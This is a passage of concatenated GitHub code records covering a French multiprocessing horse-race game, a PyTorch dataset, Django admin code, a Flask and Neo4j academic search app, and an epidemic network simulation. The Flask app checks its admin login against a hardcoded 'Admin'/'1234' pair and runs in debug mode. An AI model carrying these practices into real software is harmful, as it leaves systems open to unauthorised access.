saisie(Nb_process):\n \"\"\" cette fonction demande a l'utilisateur si il veut parier et renvoit le reponse et le pari\n Param :\n sortie:\n val : le cheval choisit, ou 'N' si le joueur n'as pas voulut parier\n parie : true ou false si le joueur a voulut parier\n \"\"\"\n valeurs = ['A', 'B', 'C','D', 'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n run = True \n parie = False\n parier = input('Parier sur un cheval ? : O / N \\n') \n # pour proteger la saisie\n if parier in ['O', 'N']:\n if parier =='O':\n parie= True\n # ta,t que l'on a pas renseig,é une valeur correcte pour le pari\n while run :\n val = input('Entrer un cheval pour parrier ! lettre majuscule A à {} \\n'.format(valeurs[Nb_process-2])) \n if val in valeurs[:Nb_process] :\n return val, parie \n else :\n return 'N',pari \n\ndef forme (ma_ligne, col, anim):\n \"\"\" Cette fonction dessine le cheval\n Parametres :\n entrées : \n ma_ligne : le debut de l'affichage\n col : la colonne du début\n anim : int qui permet de choisir un modéle\n\n sortie : \n anim : la forme que le cheval prendra au prochain tour\n \"\"\"\n ligne = ma_ligne*3\n if anim == 0:\n # on fait la tête du cheval\n move_to(ligne+1,col+7) # pour effacer toute ma ligne \n erase_line_from_beg_to_curs()\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n # on set la couleur\n print(\"(\"+chr(ord(\"A\")+ma_ligne)+\">\")\n # on fait le corps du cheval\n move_to(ligne+2,col) # pour effacer toute ma ligne \n erase_line_from_beg_to_curs()\n # on set la couleur\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n print('/|-----|')\n # on fait les pattes du cheval\n move_to(ligne+3,col+1) # pour effacer toute ma ligne \n erase_line_from_beg_to_curs()\n # on set la couleur\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n print('| | | |')\n return 1\n elif anim == 1:\n # on fait la tête du cheval\n move_to(ligne+1,col+7) # pour effacer toute ma ligne \n erase_line_from_beg_to_curs()\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n # on set la couleur\n print(\"(\"+chr(ord(\"A\")+ma_ligne)+\">\")\n # on fait le corps du cheval\n move_to(ligne+2,col) # pour effacer toute ma ligne \n erase_line_from_beg_to_curs()\n # on set la couleur\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n print('/|-----|')\n # on fait les pattes du cheval\n move_to(ligne+3,col+1) # pour effacer toute ma ligne \n erase_line_from_beg_to_curs()\n # on set la couleur\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n print('\\ \\ \\ \\ ')\n return 2 \n else :\n # on fait la tête du cheval\n move_to(ligne+1,col+7) # pour effacer toute ma ligne \n erase_line_from_beg_to_curs()\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n # on set la couleur\n print(\"(\"+chr(ord(\"A\")+ma_ligne)+\">\")\n # on fait le corps du cheval\n move_to(ligne+2,col) # pour effacer toute ma ligne \n erase_line_from_beg_to_curs()\n # on set la couleur\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n print('/|-----|')\n # on fait les pattes du cheval\n move_to(ligne+3,col+1) # pour effacer toute ma ligne \n erase_line_from_beg_to_curs()\n # on set la couleur\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n print('/ / / / ')\n return 1 \n\n# La tache d’un cheval\ndef un_cheval(ma_ligne : int, keep_running, cadna, tab) : # ma_ligne commence à 0\n col=1\n # booléen pour l'animation\n anim = 0\n while col < LONGEUR_COURSE and keep_running.value :\n # on demande un jetton \n cadna.acquire()\n \"\"\"move_to(ma_ligne+1,col) # pour effacer toute ma ligne\n erase_line_from_beg_to_curs()\n en_couleur(lyst_colors[ma_ligne%len(lyst_colors)])\n print(\"(\"+chr(ord(\"A\")+ma_ligne)+\">\")\"\"\"\n anim = forme(ma_ligne, col, anim)\n tab[ma_ligne]= col\n # on rends le jetton\n cadna.release()\n col+=1\n time.sleep(0.1*random.randint(1,5))\n \ndef pari(lst, lettre, parie, pos_afficher):\n \"\"\" cette fonction gere le pari, elle demande le cheval sur lequel l'utilisateur veux parier et valide seulement des lettres de l'alphabet en majuscule\n Parameters:\n entrée : \n lst : liste avec les positions des chevaux dans l'ordre alphabetique\n lettre : la lettre du cheval sur lequel le joueur a parrié\n parie : un booléen qui indique si le joueur a voulu parier\n pos_afficher : la ligne où afficher le pari\n \"\"\"\n # Si le joueur a dit vouloir parier\n if parie== True :\n # on recupere la position du cheval en temps réel\n pos = 0\n for valeur in lst :\n if valeur[0] == lettre :\n pos = lst.index(valeur)\n move_to(pos_afficher,2)\n en_couleur(CL_WHITE)\n # on affiche le nom du cheval et sa position dans la course\n print(\"Vous avez parié sur le Cheval {} ! Il est en position : {} \".format(lettre, pos+1))\n # le joueur n'as pas voulut parier\n else :\n move_to(pos_afficher,2)\n en_couleur(CL_WHITE)\n print(\" Pas de pari enregistré \")\n \n#−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n\n# Main -----------------------------------------------------------------------------------------\ndef course_hippique(keep_running) :\n\n Nb_process=10+1\n lock = mp.Semaphore(1)\n mes_process = [0 for i in range(Nb_process) or i in range(Nb_process)]\n # la position des chevaux de chaque sous process\n tab = mp.Array('i', range(Nb_process-1) )\n # on entre une valeur pour parier\n val_pari, parie = saisie(Nb_process)\n\n\n effacer_ecran()\n curseur_invisible()\n\n\n for i in range(Nb_process): # Lancer Nb_process processus\n # si on est au dernier terme de la liste on a crée tt les chevaux, donc on lance l'arbitre\n if i == Nb_process-1:\n mes_process[i] = mp.Process(target=arbitre, args=(tab,LONGEUR_COURSE, val_pari, parie, Nb_process))\n mes_process[i].start()\n #on crée tt les chevaux\n else : \n mes_process[i] = mp.Process(target=un_cheval, args= (i,keep_running,lock,tab))\n mes_process[i].start()\n\n\n move_to( (Nb_process-1)*4+1, 10)\n en_couleur(CL_WHITE)\n print(\"C'est parti !!!! \")\n\n for i in range(Nb_process): \n mes_process[i].join()\n\n\n move_to((Nb_process-1)*4+6, 1)\n curseur_visible()\n print(\"Course finie\")\n\nif __name__ == \"__main__\" :\n LONGEUR_COURSE = 100# Tout le monde aura la même copie (donc no need to have a ’value’)\n keep_running=mp.Value(ctypes.c_bool, True)\n\n course_hippique(keep_running)","repo_name":"AudreyNicolleCPU/Multiprocessing","sub_path":"src/course_hippique.py","file_name":"course_hippique.py","file_ext":"py","file_size_in_byte":15166,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35378208317","text":"from torchvision import transforms\nfrom torch.utils.data import Dataset\n\nimport pandas as pd\nfrom PIL import Image\nfrom pathlib import Path\nimport json\n\n\nclass SportDataset(Dataset):\n def __init__(\n self,\n mode: str = \"train\",\n transform: transforms = transforms.Resize(size=224),\n ):\n super().__init__()\n self.mode = mode\n df = pd.read_csv(f\"data/raw/{self.mode}.csv\")\n\n if self.mode == \"train\":\n self.labels = df[\"label\"].to_list()\n with open(\"data/interim/label_to_id.json\", \"r\") as file:\n self.label_to_id = json.load(file)\n with open(\"data/interim/id_to_label.json\", \"r\") as file:\n self.id_to_label = json.load(file)\n\n self.image_ids = df[\"image_id\"].to_list()\n self.p = Path(f\"data/raw/{mode}\")\n self.transform = transform\n\n def __len__(self):\n return len(self.image_ids)\n\n def __getitem__(self, idx):\n image = Image.open(str(self.p.joinpath(self.image_ids[idx]))).convert(\n \"RGB\"\n )\n\n image = self.transform(image)\n if self.mode == \"train\":\n return image, self.label_to_id[self.labels[idx]]\n return image\n","repo_name":"IPPK93/MADE_CV","sub_path":"src/data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22571107561","text":"from django.contrib import admin\n\nfrom users.models import CustomUser, Subscription\n\n\nclass CustomUserAdmin(admin.ModelAdmin):\n list_display = ('pk', 'username', 'email', 'first_name', 'last_name')\n search_fields = ('username', 'email')\n\n\nclass SubscriptionAdmin(admin.ModelAdmin):\n list_display = ('id', 'user', 'following')\n list_editable = ('user', 'following')\n\n\nadmin.site.register(CustomUser, CustomUserAdmin)\nadmin.site.register(Subscription, SubscriptionAdmin)\n","repo_name":"AndreyZyuzin/foodgram-project-react","sub_path":"backend/users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19837521554","text":"from flask import Flask,render_template,request,redirect,url_for,flash,session\nfrom flask_sqlalchemy import SQLAlchemy\nimport os\nfrom datetime import datetime \nfrom DB import DB\nimport sys\n \ndef baglantikur():\n global uri,user,password,db_neo\n uri = \"neo4j+s://7255dd1c.databases.neo4j.io:7687\"\n user = \"neo4j\"\n password = \"\"\n db_neo = DB(uri, user, password)\n\ndef baglantisonlandir():\n db_neo.close()\n\n\napp= Flask(__name__)\n\n\n@app.route(\"/vis/\",methods=[\"GET\",\"POST\"])\ndef vis(name):\n \n baglantikur()\n every_result = []\n yayin_result = db_neo.find_Arastirmaci_wrote_yayin(name)\n for re in yayin_result:\n sonuc = re[\"YayinAdi\"]\n result = db_neo.find_Yayin_to_everything(sonuc)\n every_result =every_result+result\n \n \n unique_arastirmacilar = []\n for row in every_result:\n if len(unique_arastirmacilar)>0:\n val=0\n for ad in unique_arastirmacilar:\n if ad == row[\"ArastirmaciAdi\"]:\n val+=1\n if val==0:\n unique_arastirmacilar.append(row[\"ArastirmaciAdi\"])\n else :\n unique_arastirmacilar.append( row[\"ArastirmaciAdi\"])\n \n\n\n nodes = []\n id = 0\n for ad in unique_arastirmacilar:\n veri={\n \"id\":\"\",\n \"label\":\"\"\n }\n veri.update({\"id\":id,\"label\":ad})\n id+=1\n nodes.append(veri)\n\n\n unique_yayin= []\n for row in every_result:\n if len(unique_yayin)>0:\n val=0\n for yayin in unique_yayin:\n if yayin == row[\"YayinAdi\"]:\n val+=1\n if val==0:\n unique_yayin.append(row[\"YayinAdi\"])\n else :\n unique_yayin.append( row[\"YayinAdi\"])\n \n\n for yayin in unique_yayin:\n veri1={\n \"id\":\"\",\n \"label\":\"\"\n }\n veri1.update({\"id\":id,\"label\":yayin})\n id+=1\n nodes.append(veri1)\n\n\n unique_tur= []\n for row in every_result:\n if len(unique_tur)>0:\n val=0\n for tur in unique_tur:\n if tur == row[\"YayinYeri\"]:\n val+=1\n if val==0:\n unique_tur.append(row[\"YayinYeri\"])\n else :\n unique_tur.append( row[\"YayinYeri\"])\n \n\n for tur in unique_tur:\n veri2={\n \"id\":\"\",\n \"label\":\"\"\n }\n veri2.update({\"id\":id,\"label\":tur})\n id+=1\n nodes.append(veri2)\n \n\n\n connection=[]\n for row in every_result:\n \n if len(connection)>0:\n for one in nodes:\n for two in nodes:\n for tree in nodes:\n if one[\"label\"]==row[\"ArastirmaciAdi\"] and two[\"label\"]==row[\"YayinAdi\"]and tree[\"label\"]==row[\"YayinYeri\"]:\n key1=0\n for deger in connection:\n if deger[\"one\"]==one[\"id\"] and deger[\"two\"]==two[\"id\"]:\n key1=1\n con3={\n \"one\":\"\",\n \"two\":\"\"\n }\n con3.update({\"one\":one[\"id\"],\"two\":two[\"id\"]})\n if key1==0:\n connection.append(con3)\n\n\n key2=0\n for deger in connection:\n if deger[\"one\"]==two[\"id\"] and deger[\"two\"]==tree[\"id\"]:\n key2=1\n con4={\n \"one\":\"\",\n \"two\":\"\"\n }\n con4.update({\"one\":two[\"id\"],\"two\":tree[\"id\"]})\n if key2==0:\n connection.append(con4)\n else:\n \n for one in nodes:\n for two in nodes:\n for tree in nodes:\n if one[\"label\"]==row[\"ArastirmaciAdi\"] and two[\"label\"]==row[\"YayinAdi\"]and tree[\"label\"]==row[\"YayinYeri\"]:\n \n con1={\n \"one\":\"\",\n \"two\":\"\"\n }\n con1.update({\"one\":one[\"id\"],\"two\":two[\"id\"]})\n connection.append(con1)\n con2={\n \"one\":\"\",\n \"two\":\"\"\n }\n con2.update({\"one\":two[\"id\"],\"two\":tree[\"id\"]})\n connection.append(con2)\n\n baglantisonlandir()\n return render_template(\"vis.html\",data=nodes,connection=connection)\n\n@app.route(\"/\",methods=[\"GET\",\"POST\"])\ndef home():\n \n if request.method==\"POST\":\n \n sec=request.form.get(\"sec\")\n fname=request.form.get(\"fname\")\n veriler = []\n baglantikur()\n\n result = db_neo.search(sec, fname)\n baglantisonlandir()\n \n return render_template('home.html', veriler=result)\n return render_template(\"home.html\")\n\n@app.route(\"/adminhome\",methods=[\"GET\",\"POST\"])\ndef adminhome():\n if request.method==\"POST\":\n baglantikur()\n YayinYeri=db_neo.find_YayinYeri()\n YayinAdi=db_neo.find_YayinAdi()\n ArastirmaciAdi=db_neo.find_ArastirmaciAdi()\n return render_template('createBaglanti.html',YayinYeri=YayinYeri,YayinAdi=YayinAdi,ArastirmaciAdi=ArastirmaciAdi)\n baglantisonlandir()\n\n return render_template(\"adminhome.html\")\n\n@app.route(\"/admingiris\",methods=[\"GET\",\"POST\"])\ndef admingiris():\n if request.method==\"POST\":\n baglantikur()\n kullaniciAdi =request.form.get('kullaniciAdi')\n password=request.form.get('password')\n if kullaniciAdi==\"Admin\" and password==\"1234\":\n return redirect(url_for('adminhome'))\n baglantisonlandir() \n return render_template(\"admingiris.html\")\n\n@app.route(\"/createBaglanti\",methods=[\"GET\",\"POST\"])\ndef createBaglanti():\n new_YayinYeri = []\n new_YayinAdi = []\n new_YayinTuru = []\n new_ArastırmaciAdi = []\n baglantikur()\n\n YayinYeri=db_neo.find_YayinYeri()\n\n for yayinyeri in YayinYeri:\n if yayinyeri != None:\n yayinyeri = yayinyeri.replace(\" \",\"_\")\n new_YayinYeri.append(yayinyeri)\n\n YayinAdi=db_neo.find_YayinAdi()\n\n for yayinadi in YayinAdi:\n if yayinadi != None:\n yayinadi = yayinadi.replace(\" \",\"_\")\n new_YayinAdi.append(yayinadi)\n\n YayinTuru=db_neo.find_YayinTuru()\n\n for yayinturu in YayinTuru:\n if yayinturu != None:\n yayinturu = yayinturu.replace(\" \",\"_\")\n new_YayinTuru.append(yayinturu)\n \n\n ArastirmaciAdi=db_neo.find_ArastirmaciAdi()\n\n for arastirmaciadi in ArastirmaciAdi:\n if arastirmaciadi != None:\n arastirmaciadi = arastirmaciadi.replace(\" \",\"_\")\n new_ArastırmaciAdi.append(arastirmaciadi)\n\n baglantisonlandir()\n if request.method==\"POST\":\n YayinYeri=request.form.get(\"YayinYeri\")\n YayinAdi=request.form.get(\"YayinAdi\")\n YayinTuru=request.form.get(\"YayinTuru\")\n ArastirmaciAdi=request.form.get(\"ArastirmaciAdi\") \n ArastirmaciAdi=ArastirmaciAdi.replace(\"_\",\" \")\n YayinAdi=YayinAdi.replace(\"_\",\" \")\n YayinTuru=YayinTuru.replace(\"_\",\" \")\n YayinYeri=YayinYeri.replace(\"_\",\" \")\n\n \n baglantikur()\n if YayinYeri !='' and YayinAdi !='' and ArastirmaciAdi !='' :\n if db_neo.y_t_c_sorgu(YayinAdi, YayinYeri, YayinTuru):\n db_neo.create_yayin_to_tur_connection(YayinAdi,YayinYeri,YayinTuru)#yayinID --- turID\n \n if db_neo.a_y_c_sorgu(ArastirmaciAdi, YayinAdi):\n db_neo.create_arastirmacilar_to_yayin_connection(ArastirmaciAdi ,YayinAdi)#\n \n baglantisonlandir()\n\n return render_template(\"createBaglanti.html\",YayinTuru=new_YayinTuru,YayinYeri=new_YayinYeri,YayinAdi=new_YayinAdi,ArastirmaciAdi=new_ArastırmaciAdi)\n\n\n\n@app.route(\"/createTur\",methods=[\"GET\",\"POST\"])\ndef createTur():\n if request.method==\"POST\": \n YayinTuru=request.form.get(\"YayinTuru\")\n YayinYeri=request.form.get(\"YayinYeri\")\n baglantikur()\n if db_neo.tur_sorgu(YayinTuru, YayinYeri):\n db_neo.create_tur(YayinTuru,YayinYeri)\n baglantisonlandir()\n return redirect(url_for('adminhome'))\n return render_template(\"createTur.html\")\n\n\n@app.route(\"/createArastirmaci\",methods=[\"GET\",\"POST\"])\ndef createArastirmaci(): \n if request.method==\"POST\":\n ArastirmaciAdi=request.form.get(\"ArastirmaciAdi\")\n ArastirmaciSoyadi=request.form.get(\"ArastirmaciSoyadi\")\n baglantikur()\n if db_neo.arastirmaci_sorgu(ArastirmaciAdi, ArastirmaciSoyadi):\n db_neo.create_arastirmaci(ArastirmaciAdi, ArastirmaciSoyadi)\n baglantisonlandir()\n return redirect(url_for('adminhome'))\n return render_template(\"createArastirmaci.html\")\n\n\n@app.route(\"/createYayin\",methods=[\"GET\",\"POST\"])\ndef createYayin(): \n if request.method==\"POST\":\n YayinAdi=request.form.get(\"YayinAdi\")\n YayinYili=request.form.get(\"YayinYili\")\n baglantikur()\n if db_neo.yayin_sorgu(YayinAdi, YayinYili):\n db_neo.create_yayin(YayinAdi, YayinYili)\n baglantisonlandir()\n return redirect(url_for('adminhome'))\n return render_template(\"createYayin.html\")\n\n\nif __name__ ==\"__main__\":\n app.debug=True\n app.run()\n","repo_name":"oguzhankoc55/Academic-Search-System-yazlab_2.3","sub_path":"Yazlab_2.3/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71048535467","text":"from network import DiseaseNetwork \nfrom disease_node import DiseaseNode\nfrom sir_node import SIRNode\nfrom vars import VarGetter\nfrom seirs_node import SEIRSNode\nfrom seirs_de_node import SEIRSDENode\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nfrom tqdm import tqdm\nfrom collections import defaultdict\n\nfrom scipy import signal, fft\n\ndef stochastic_distribution_test(trials = 1000):\n # Spoiler its just the binomial distribution\n total_num = 200\n prob_of_event = 0.1\n boxes = np.zeros(total_num)\n for _ in range(trials):\n boxes[np.random.binomial(total_num, prob_of_event)] += 1\n\n plt.plot(np.arange(total_num), boxes)\n plt.show()\n\ndef quarantine_v_travel_ban(trials=10, city_to_analyze='Chicago'):\n v=VarGetter()\n\n idxvals = []\n maxvals = []\n\n thresh_vals = np.around(np.linspace(.05, .4, 30), 2)\n quarantine_days_list = np.arange(0, 15)\n\n for quarantine_days in tqdm(quarantine_days_list, 'QDays Trials'):\n idxvals2 = []\n maxvals2 = []\n\n for threshold in thresh_vals:\n v.threshold = threshold \n v.dvars['quarantine_days'] = quarantine_days\n\n avg_I_data, _ = get_avg_data(trials, v)\n idxvals2.append(avg_I_data.idxmax(axis=1)[city_to_analyze])\n maxvals2.append(avg_I_data.max(axis=1)[city_to_analyze])\n\n idxvals.append(idxvals2)\n maxvals.append(maxvals2)\n\n idxdf = pd.DataFrame(idxvals, index=quarantine_days_list, columns=thresh_vals)\n maxdf = pd.DataFrame(maxvals, index=quarantine_days_list, columns=thresh_vals)\n\n _, ax = plt.subplots(1, 2)\n\n sns.heatmap(idxdf, ax=ax[0])\n ax[0].set_ylabel('Quarantine Days')\n ax[0].set_xlabel('Travel Ban Threhold (Fraction of Population)')\n ax[0].set_title('Time to Peak')\n\n sns.heatmap(maxdf, ax=ax[1])\n ax[1].set_ylabel('Quarantine Days')\n ax[1].set_xlabel('Travel Ban Threhold (Fraction of Population)')\n ax[1].set_title('Max Percent of Population Infected')\n\n plt.show()\n # plt.savefig('Ban vs Quarantine.png')\n \ndef beta_ttp(trials=10):\n v = VarGetter()\n\n betas, ttpfargo, ttpchicago, ttpcolumbus, ttpwichita = [], [], [], [], []\n\n for i in tqdm(np.linspace(0.1, 1, 20), 'Betas'):\n v.dvars['beta'] = i\n betas.append(i)\n\n avg_I_data, _ = get_avg_data(trials, v)\n\n ttpfargo.append(avg_I_data.idxmax(axis=1)['Fargo'])\n ttpchicago.append(avg_I_data.idxmax(axis=1)['Chicago'])\n ttpcolumbus.append(avg_I_data.idxmax(axis=1)['Columbus'])\n ttpwichita.append(avg_I_data.idxmax(axis=1)['Wichita'])\n\n plt.scatter(betas, ttpfargo, color='orange', label='Fargo')\n plt.scatter(betas, ttpchicago, color='blue', label='Chicago')\n plt.scatter(betas, ttpcolumbus, color='green', label='Columbus')\n plt.scatter(betas, ttpwichita, color='red', label='Wichita')\n plt.xlabel('Beta Values')\n plt.ylabel('Log of Time (Days)')\n plt.title(f'Beta Values vs Time to Peak for {v.get_start_nodes()[0]}')\n plt.legend()\n plt.show()\n plt.savefig('betas vs ttp chicago start.png')\n\ndef test_multiple_beta_values(trials=10):\n v = VarGetter()\n \n # color_pairs = [('deeppink', 'lavenderblush'), ('blueviolet', 'lavender'), ('cyan', 'lightcyan'), ('chartreuse', 'honeydew'), ('grey', 'lightgrey'), ('red', 'lightcoral'), ('blue', 'lightblue'), ('green', 'lightgreen'), ('orange', 'navajowhite')]\n color_pairs = [('red', 'lightcoral'), ('grey', 'lightgrey'), ('grey', 'lightgrey'), ('grey', 'lightgrey'), ('blue', 'lightblue'), ('grey', 'lightgrey'), ('grey', 'lightgrey'), ('grey', 'lightgrey'), ('green', 'lightgreen')]\n beta_vals = np.around(np.linspace(.2, .5, 9), 2)\n\n idxmax = []\n maxvals = []\n city_to_eval = 'Chicago'\n\n plt.subplot(1, 3, 1)\n\n for colors, beta in zip(color_pairs, beta_vals):\n dark, light = colors\n v.dvars['beta'] = beta\n a, b, c, d, x, y, z = test_time_of_max_i(trials, False, v)\n plt.scatter(x, y, color=light)\n plt.plot(x, a * pow(x, 3) + b * pow(x, 2) + c * x + d, color=dark, label=f'{beta}')\n\n idxmax.append(y[city_to_eval])\n maxvals.append(z[city_to_eval])\n\n plt.legend()\n plt.xlabel(f\"Distances from {v.get_start_nodes()[0]} (Miles)\")\n plt.ylabel('Time to Peak (Days)')\n plt.title(f\"Comparing Disease Spread with Different Betas\")\n\n plt.subplot(1, 3, 2)\n plt.scatter(beta_vals, idxmax, color='blue')\n plt.xlabel('Beta Value')\n plt.ylabel('Time to Peak (Days)')\n plt.title(f'Time to Peak vs Beta Value ({city_to_eval})')\n\n plt.subplot(1, 3, 3)\n plt.scatter(beta_vals, maxvals, color='blue')\n plt.xlabel('Beta Value')\n plt.ylabel('Max Percent of Population Infected')\n plt.title(f'Max Percent of Population Infected vs Beta Value ({city_to_eval})')\n\n plt.show()\n\ndef test_multiple_policies(trials=10):\n v = VarGetter()\n line_vars = []\n plt.subplot(1, 2, 1)\n v.dvars['quarantine_days'] = 0\n v.threshold = 1\n v.beta = .4\n a, b, c, d, x, y, _ = test_time_of_max_i(trials, False, v)\n plt.scatter(x, y, color='lightgreen')\n plt.plot(x, a * pow(x, 3) + b * pow(x, 2) + c * x + d, color='green', label='No Restrictions')\n line_vars.append((a, b, c, d))\n\n v.dvars['quarantine_days'] = 0\n v.threshold = .2\n v.beta = .4\n a, b, c, d, x, y, _ = test_time_of_max_i(trials, False, v)\n plt.scatter(x, y, color='lightblue')\n plt.plot(x, a * pow(x, 3) + b * pow(x, 2) + c * x + d, color='blue', label='20% Travel Ban')\n line_vars.append((a, b, c, d))\n\n v.dvars['quarantine_days'] = 5\n v.threshold = 1\n v.beta = .4\n a, b, c, d, x, y, _ = test_time_of_max_i(trials, False, v)\n plt.scatter(x, y, color='lightgrey')\n plt.plot(x, a * pow(x, 3) + b * pow(x, 2) + c * x + d, color='grey', label='5 Day Quarantine')\n line_vars.append((a, b, c, d))\n\n v.dvars['quarantine_days'] = 0\n v.threshold = 1\n v.beta = .2\n a, b, c, d, x, y, _ = test_time_of_max_i(trials, False, v)\n plt.scatter(x, y, color='lavender')\n plt.plot(x, a * pow(x, 3) + b * pow(x, 2) + c * x + d, color='purple', label='.2 Beta')\n line_vars.append((a, b, c, d))\n\n v.dvars['quarantine_days'] = 5\n v.threshold = .2\n v.beta = .2\n a, b, c, d, x, y, _ = test_time_of_max_i(trials, False, v)\n plt.scatter(x, y, color='mistyrose')\n plt.plot(x, a * pow(x, 3) + b * pow(x, 2) + c * x + d, color='red', label='All Policies')\n line_vars.append((a, b, c, d))\n\n plt.legend(loc='upper left')\n plt.xlabel(f\"Distances from {v.get_start_nodes()[0]} (Miles)\")\n plt.ylabel('Time to Peak (Days)')\n plt.title(f\"Comparing Max I Different Combinations Threhold, Quarantine and Beta\")\n\n plt.subplot(1, 2, 2)\n a, b, c, d = line_vars[0]\n no_policy = a * pow(x, 3) + b * pow(x, 2) + c * x + d\n a, b, c, d = line_vars[1]\n thresh = a * pow(x, 3) + b * pow(x, 2) + c * x + d\n a, b, c, d = line_vars[2]\n quar = a * pow(x, 3) + b * pow(x, 2) + c * x + d\n a, b, c, d = line_vars[3]\n beta = a * pow(x, 3) + b * pow(x, 2) + c * x + d\n a, b, c, d = line_vars[4]\n plt.plot(x, (thresh - no_policy) + (quar - no_policy) + (beta - no_policy), color='green', label='Implemented Individually')\n plt.plot(x, a * pow(x, 3) + b * pow(x, 2) + c * x + d - no_policy, color='blue', label='Implemented Together')\n plt.legend(loc='upper left')\n plt.xlabel(f\"Distances from {v.get_start_nodes()[0]} (Miles)\")\n plt.ylabel('Time to Peak (Days)')\n plt.title(f\"Policies Implemented Individually versus Together\")\n plt.show()\n\ndef test_multiple_policies_single_node(trials=10, city_to_analyze='Chicago'):\n v = VarGetter()\n \n v.dvars['beta'] = .2\n avg_I_data, time_tracker = get_avg_data(trials, v)\n plt.plot(time_tracker, avg_I_data.loc[city_to_analyze], color='green', label='.2')\n\n v.dvars['beta'] = .3\n avg_I_data, time_tracker = get_avg_data(trials, v)\n plt.plot(time_tracker, avg_I_data.loc[city_to_analyze], color='blue', label='.3')\n\n v.dvars['beta'] = .4\n avg_I_data, time_tracker = get_avg_data(trials, v)\n plt.plot(time_tracker, avg_I_data.loc[city_to_analyze], color='purple', label='.4')\n\n v.dvars['beta'] = .5\n avg_I_data, time_tracker = get_avg_data(trials, v)\n plt.plot(time_tracker, avg_I_data.loc[city_to_analyze], color='red', label='.5')\n plt.legend()\n plt.xlabel('Time (Days)')\n plt.ylabel('Percent of Population Infected')\n plt.title(f'Comparing Different Betas on a Single Node ({city_to_analyze})')\n plt.show()\n\ndef get_avg_data(trials, v):\n avg_I_data = pd.DataFrame([])\n for i in tqdm(range(trials), desc=\"Trials\"):\n good = False\n while(not good):\n try:\n net = DiseaseNetwork(v.get_cities(), v.get_distances(), SEIRSNode, v.get_dvars(), v.get_time_vars(), v.get_travel_vars())\n tracker, _, time_tracker, _ = net.simulate()\n good = True\n except KeyboardInterrupt as ki:\n print(\"Exiting\")\n exit()\n except:\n print(\"Invalid Run\")\n\n distance_from_start_order = np.array(v.get_distances()[np.where(np.array(v.get_cities())[:,0] == v.get_start_nodes()[0])[0][0]]).argsort()\n city_list = np.array(list(tracker))[distance_from_start_order]\n I_populations = np.array([[i[2] / i[4] for i in np.array(city_stats)] for city_stats in tracker.values()])[distance_from_start_order]\n\n def logplusone(a):\n return np.log10(a+1)\n data = pd.DataFrame(I_populations, columns=time_tracker, index=city_list).apply(logplusone)\n\n if avg_I_data.empty:\n avg_I_data = data \n else:\n avg_I_data += data \n\n return avg_I_data.div(trials), time_tracker\n\ndef test_time_of_max_i(trials=10, show=True, v=VarGetter()):\n avg_I_data, time_tracker = get_avg_data(trials, v)\n\n distances = pd.DataFrame(np.array(v.get_distances()[np.where(np.array(v.get_cities())[:,0] == v.get_start_nodes()[0])[0][0]]), columns=[\"Distances\"], index=np.array(v.get_cities())[:,0])\n populations = pd.DataFrame(v.get_cities(), columns=['Cities', 'Population']).set_index('Cities').apply(np.log)\n city_vals = pd.concat([distances, populations], axis=1).sort_values(by=\"Distances\")\n\n colors = [\"green\" if i == 'Columbus' else \"blue\" if i == 'Chicago' else \"red\" if i == 'Fargo' else \"orange\" if i == 'Wichita' else \"lightgrey\" for i in distances.index]\n\n WIDTH = 1\n SIGNAL = signal.morlet2\n\n a, b, c, d = np.polyfit(city_vals['Distances'], avg_I_data.idxmax(axis=1), 3)\n if(show):\n _, ax = plt.subplots(1, 3)\n ax[0].scatter(city_vals['Distances'], avg_I_data.idxmax(axis=1), color=colors)\n ax[0].plot(city_vals['Distances'], a * pow(city_vals['Distances'], 3) + b * pow(city_vals['Distances'], 2) + c * city_vals['Distances'] + d)\n ax[0].set_title(\"Max I Value\")\n ax[0].set_ylabel(\"Time in Days\")\n ax[0].set_xlabel(f\"Distances from {v.get_start_nodes()[0]}\")\n\n ax[1].scatter(city_vals['Population'], avg_I_data.idxmax(axis=1), color=colors)\n ax[1].set_title(\"Max I Value\")\n ax[1].set_ylabel(\"Time in Days\")\n ax[1].set_xlabel(f\"Population\")\n\n # max_wavelet = []\n # for i in avg_I_data.index:\n # max_wavelet.append(np.argmax(abs(signal.cwt(avg_I_data.loc[i], SIGNAL, [1]))) * get_time_vars()['time_step'])\n\n # ax[1].scatter(distances, max_wavelet, color=colors)\n # ax[1].set_title(\"Max value of wavelet transform\")\n\n for i in avg_I_data.index:\n color = 'lightgray'\n cwtmatr = signal.cwt(avg_I_data.loc[i], SIGNAL, [1])\n ax[2].plot(time_tracker[:], abs(cwtmatr[WIDTH - 1])[:], color)\n\n for i in ['Fargo', 'Columbus', 'Chicago', 'Wichita']:\n if i == 'Fargo':\n color = 'r'\n cwtmatr = signal.cwt(avg_I_data.loc[i], SIGNAL, [1])\n ax[2].plot(time_tracker[:], abs(cwtmatr[WIDTH - 1])[:], color, label=i)\n elif i == 'Columbus':\n color = 'g'\n cwtmatr = signal.cwt(avg_I_data.loc[i], SIGNAL, [1])\n ax[2].plot(time_tracker[:], abs(cwtmatr[WIDTH - 1])[:], color, label=i)\n elif i == 'Chicago':\n color = 'b'\n cwtmatr = signal.cwt(avg_I_data.loc[i], SIGNAL, [1])\n ax[2].plot(time_tracker[:], abs(cwtmatr[WIDTH - 